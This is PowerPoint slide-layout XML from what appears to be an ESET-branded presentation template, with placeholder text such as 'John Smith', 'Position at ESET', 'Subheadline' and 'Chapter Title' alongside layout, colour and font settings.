                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88043803-0909-18DD-0BE9-61A3DFCD81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047290" y="2961294"/>
            <a:ext cx="4364410" cy="4364410"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004B55">
              <a:alpha val="90000"/>
            </a:srgb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b="0" spc="-40" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="3500" spc="-40" baseline="0"/>
            </a:lvl2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="3500" spc="-40" baseline="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to add a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK"/>
              <a:t>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2255D5-BE13-A060-ABF6-6EBD63EEB9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6300" y="920729"/>
            <a:ext cx="16535400" cy="1431256"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr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5683751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2377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sh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icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F78073A-8B32-09C7-B324-E42CE96B98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174804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19AECA83-EE18-D1B9-CC97-0456839636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34103" y="8787741"/>
            <a:ext cx="3588792" cy="62296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2958314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Turq">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="0096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979103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Turq Logo">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="0096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2787FA0-CC15-1EBF-C8A8-DFDB7965F4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72000" y="8784000"/>
            <a:ext cx="4103234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0428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lpcovy + odrazky 2bloky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DAFF146E-597A-E9DC-782F-B3A0CB3F6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E7037D-43C7-9137-36C8-186FE94585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9513" y="885558"/>
            <a:ext cx="10515600" cy="964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Slide title</a:t>
            </a:r>
            <a:endParaRPr lang="en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2234D0-83D8-9E99-3998-B1ACA3D3466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59513" y="3655148"/>
            <a:ext cx="7658013" cy="5399951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35C6AE-BF0E-FFC9-29FE-78B1089E17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9513" y="1935736"/>
            <a:ext cx="7754697" cy="13255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Title column 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-S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A08977-F3B0-589A-72AB-C22FDA34EF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17899" y="3655149"/>
            <a:ext cx="7658013" cy="5399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Text column 2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2CD0EBA-F611-25D4-F867-65B9970A36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3791" y="1935737"/>
            <a:ext cx="8914209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Title column 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-SK"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266373531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0A86EB-00A1-05E9-9B6E-6223D3EACF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1536484"/>
            <a:ext cx="10724573" cy="2924984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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r>
              <a:rPr lang="en-US"/>
              <a:t>ESET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6300" y="4462177"/>
            <a:ext cx="10724573" cy="1450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500">
                <a:solidFill>
                  <a:schemeClr val="bg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err="1"/>
              <a:t>Subheadline</a:t>
            </a:r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B20EF9-3D25-52F4-8567-10AF721D02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6132779"/>
            <a:ext cx="3586162" cy="51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2500" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="3000" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="2700" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="2400" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="2400"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>John Smith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A9820CD4-35F0-D860-6521-472B1F2F0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668813"/>
            <a:ext cx="3586162" cy="5159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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Position at ESET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50FB943-52AF-0572-835A-1257A716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895202"/>
            <a:ext cx="3586162" cy="412806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>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1/1/2023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DA62D83-B0D2-9D5D-E860-724A170664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72000" y="8784000"/>
            <a:ext cx="4103227" cy="720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356144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- inver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3288145"/>
            <a:ext cx="12457563" cy="2974109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="8000">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Chapter Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4113208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193557-5918-9B2C-277D-3E490BF12B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1536484"/>
            <a:ext cx="10724573" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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r>
              <a:rPr lang="en-US"/>
              <a:t>ESET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6300" y="5255997"/>
            <a:ext cx="10724573" cy="1450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500">
                <a:solidFill>
                  <a:schemeClr val="bg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err="1"/>
              <a:t>Subheadline</a:t>
            </a:r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B20EF9-3D25-52F4-8567-10AF721D02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7053977"/>
            <a:ext cx="3586162" cy="51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2500" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="3000" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="2700" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="2400" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="2400"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>John Smith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A9820CD4-35F0-D860-6521-472B1F2F0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14061"/>
            <a:ext cx="3586162" cy="5159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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Position at ESET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50FB943-52AF-0572-835A-1257A716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895202"/>
            <a:ext cx="3586162" cy="412806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>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1/1/2023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AE688B1-A6C6-753F-3E25-66F59C2E72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72000" y="8784000"/>
            <a:ext cx="4147827" cy="720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99045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Tech De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E44C4C9-9231-1BF5-FF07-A477E9A0D3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7999" cy="10287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1536484"/>
            <a:ext cx="10724573" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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r>
              <a:rPr lang="en-US"/>
              <a:t>ESET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6300" y="5255997"/>
            <a:ext cx="10724573" cy="1450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500">
                <a:solidFill>
                  <a:schemeClr val="bg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err="1"/>
              <a:t>Subheadline</a:t>
            </a:r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B20EF9-3D25-52F4-8567-10AF721D02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7053977"/>
            <a:ext cx="3586162" cy="51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2500" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="3000" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="2700" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="2400" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="2400"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>John Smith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A9820CD4-35F0-D860-6521-472B1F2F0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14061"/>
            <a:ext cx="3586162" cy="5159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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Position at ESET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50FB943-52AF-0572-835A-1257A716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895202"/>
            <a:ext cx="3586162" cy="412806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>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1/1/2023</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Graphic 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEFA6E13-FB67-41A9-35E4-2F8E72CA6C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72000" y="8784000"/>
            <a:ext cx="4105159" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="368300">
              <a:schemeClr val="tx2">
                <a:alpha val="4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502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Tech Dec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E44C4C9-9231-1BF5-FF07-A477E9A0D3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7999" cy="10286999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1536484"/>
            <a:ext cx="9654373" cy="35814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0000"/>
              </a:lnSpc>
              <a:defRPr sz="9000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ESET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6301" y="5255997"/>
            <a:ext cx="9131858" cy="1450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500">
                <a:solidFill>
                  <a:srgbClr val="87CFD3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err="1"/>
              <a:t>Subheadline</a:t>
            </a:r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B20EF9-3D25-52F4-8567-10AF721D02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7053977"/>
            <a:ext cx="3586162" cy="51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2500" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="3000" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="2700" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="2400" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="2400"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>John Smith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A9820CD4-35F0-D860-6521-472B1F2F0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14061"/>
            <a:ext cx="3586162" cy="5159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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Position at ESET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50FB943-52AF-0572-835A-1257A716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895202"/>
            <a:ext cx="3586162" cy="412806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>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1/1/2023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7D520E-5AB1-9B7B-6D99-8C1799C862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72000" y="8784000"/>
            <a:ext cx="4103227" cy="720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346646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ustom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1536484"/>
            <a:ext cx="10724573" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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r>
              <a:rPr lang="en-US"/>
              <a:t>ESET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76300" y="5255997"/>
            <a:ext cx="10724573" cy="1450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500">
                <a:solidFill>
                  <a:schemeClr val="bg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err="1"/>
              <a:t>Subheadline</a:t>
            </a:r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B20EF9-3D25-52F4-8567-10AF721D02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7053977"/>
            <a:ext cx="3586162" cy="51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2500" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="3000" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="2700" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="2400" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="2400"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>John Smith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A9820CD4-35F0-D860-6521-472B1F2F0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7614061"/>
            <a:ext cx="3586162" cy="5159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en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="004B55"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Position at ESET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50FB943-52AF-0572-835A-1257A71634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895202"/>
            <a:ext cx="3586162" cy="412806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>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="87CFD3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" sz="1000" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1/1/2023</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39687349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A109A039-0885-DE55-C6CF-C6C01E9A91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3288145"/>
            <a:ext cx="12976178" cy="2974109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/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Chapter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79A8F13-6F19-C8B3-D145-4A50E2985D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72000" y="8784000"/>
            <a:ext cx="4147826" cy="720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98625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rotection De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09A039-0885-DE55-C6CF-C6C01E9A91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3288145"/>
            <a:ext cx="12976178" cy="2974109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/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Chapter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2A07996-8A44-7C26-2F3A-155AC49521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72000" y="8784000"/>
            <a:ext cx="4147827" cy="720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8560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- inver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76300" y="3288145"/>
            <a:ext cx="12457563" cy="2974109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="8000">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Chapter Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3391966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ADA6AD44-9C0B-77DB-5118-5247E47118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056880" y="3940925"/>
            <a:ext cx="8938260" cy="1131455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John Smith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498D56B-8EB3-7F7F-2CEF-E3634B8569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09863" y="2768600"/>
            <a:ext cx="4749800" cy="4749800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E25AB9-294A-CD6A-3474-249EEB6842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57515" y="5194302"/>
            <a:ext cx="8937625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424D56"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Job Position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A7326AE-E5AC-F8C1-8C35-1E21CD259C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57515" y="6306822"/>
            <a:ext cx="8937625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424D56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Contacts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1160758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me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ADA6AD44-9C0B-77DB-5118-5247E47118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056880" y="3940925"/>
            <a:ext cx="8938260" cy="1131455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John Smith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498D56B-8EB3-7F7F-2CEF-E3634B8569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09863" y="2768600"/>
            <a:ext cx="4749800" cy="4749800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E25AB9-294A-CD6A-3474-249EEB6842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57515" y="5194302"/>
            <a:ext cx="8937625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949CA1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Job Position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A7326AE-E5AC-F8C1-8C35-1E21CD259C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57515" y="6306822"/>
            <a:ext cx="8937625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949CA1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Contacts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3031381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ADA6AD44-9C0B-77DB-5118-5247E47118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70530" y="6296025"/>
            <a:ext cx="2973070" cy="657223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b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John Smith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498D56B-8EB3-7F7F-2CEF-E3634B8569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52766" y="2482903"/>
            <a:ext cx="3568595" cy="3568595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E25AB9-294A-CD6A-3474-249EEB6842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1165" y="70751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424D56"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Job Position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A7326AE-E5AC-F8C1-8C35-1E21CD259C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71165" y="75420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rgbClr val="424D56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BBF84D8-507C-A802-E83A-B649196E8972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7677466" y="6296025"/>
            <a:ext cx="2973070" cy="657223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr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John Smith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0319E42-C729-4CEB-F028-0D7DC7032F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59702" y="2482903"/>
            <a:ext cx="3568595" cy="3568595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730FF9F-A587-D4B1-4EA3-1E05E3BAD5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78101" y="70751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424D56"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Job Position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F7ED0AE0-BD98-2806-3EA9-57DD282267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78101" y="75420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rgbClr val="424D56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CF35625-C9EA-1E30-153F-C68A12B50F9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12384403" y="6296025"/>
            <a:ext cx="2973070" cy="657223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr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John Smith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0EA49B31-B04C-AE21-16AD-EE0C61012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066639" y="2482903"/>
            <a:ext cx="3568595" cy="3568595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6C7B98D6-B1EE-1642-3E37-0A80314352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385038" y="70751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424D56"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Job Position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4E874517-08B6-7424-7B50-FA4C4FD730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85038" y="75420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rgbClr val="424D56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Contacts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3772425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ADA6AD44-9C0B-77DB-5118-5247E47118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056880" y="3940925"/>
            <a:ext cx="8938260" cy="1131455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John Smith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498D56B-8EB3-7F7F-2CEF-E3634B8569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09863" y="2768600"/>
            <a:ext cx="4749800" cy="4749800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E25AB9-294A-CD6A-3474-249EEB6842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57515" y="5194302"/>
            <a:ext cx="8937625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424D56"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Job Position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A7326AE-E5AC-F8C1-8C35-1E21CD259C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57515" y="6306822"/>
            <a:ext cx="8937625" cy="3657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424D56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Contacts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3102849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ADA6AD44-9C0B-77DB-5118-5247E47118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70530" y="6296025"/>
            <a:ext cx="2973070" cy="657223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b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John Smith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498D56B-8EB3-7F7F-2CEF-E3634B8569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52766" y="2482903"/>
            <a:ext cx="3568595" cy="3568595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E25AB9-294A-CD6A-3474-249EEB6842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1165" y="70751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949CA1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Job Position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A7326AE-E5AC-F8C1-8C35-1E21CD259C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71165" y="7562852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rgbClr val="949CA1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BBF84D8-507C-A802-E83A-B649196E8972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7677466" y="6296025"/>
            <a:ext cx="2973070" cy="657223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr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John Smith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0319E42-C729-4CEB-F028-0D7DC7032F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59702" y="2482903"/>
            <a:ext cx="3568595" cy="3568595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730FF9F-A587-D4B1-4EA3-1E05E3BAD5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78101" y="70751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949CA1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Job Position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F7ED0AE0-BD98-2806-3EA9-57DD282267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78101" y="7562852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rgbClr val="949CA1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CF35625-C9EA-1E30-153F-C68A12B50F9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12384403" y="6296025"/>
            <a:ext cx="2973070" cy="657223"/>
